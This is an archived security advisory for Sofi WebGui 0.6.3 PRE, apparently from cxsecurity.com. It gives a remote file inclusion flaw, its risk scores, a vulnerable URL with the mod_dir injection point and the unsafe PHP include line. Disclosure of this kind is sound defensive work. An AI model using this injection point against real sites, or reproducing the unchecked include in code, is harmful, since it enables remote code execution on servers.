Sofi WebGui <= 0.6.3 PRE (mod_dir) Remote File Inclusion Vulnerability

2009.03.09
Credit: dun
Risk: High
Local: No
Remote: Yes
CWE: CWE-94


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

:::::::-. ... ::::::. :::. ;;, `';, ;; ;;;`;;;;, `;;; `[[ [[[[' [[[ [[[[[. '[[ $$, $$$$ $$$ $$$ "Y$c$$ 888_,o8P'88 .d888 888 Y88 MMMMP"` "YmmMMMM"" MMM YM [ Discovered by dun \ dun[at]strcpy.pl ] ######################################################################### # [ Sofi WebGui <= 0.6.3 PRE ] Remote File Inclusion Vulnerability # ######################################################################### # # Script site: http://www.muskatli.net/studio/hu/?f=sofi-wgui-hu # Download: http://www.muskatli.net/site/files/news_data/100004_100192_sofi_webgui_0.6.0.pre-release-3.tar.gz # # Vuln: http://site.com/sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=[spread???] # # # Bug: ./sofi_webgui/hu/modules/reg-new/modstart.php (line: 26) # # ... # if($ff=="") $ff = "index"; # $file_name = "m_$ff.php"; # # //start web module # include("$mod_dir/$file_name"); // RFI # ... # # ############################################### # Greetz: D3m0n_DE * str0ke * and otherz.. ############################################### [ dun / 2008 ] *******************************************************************************************


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top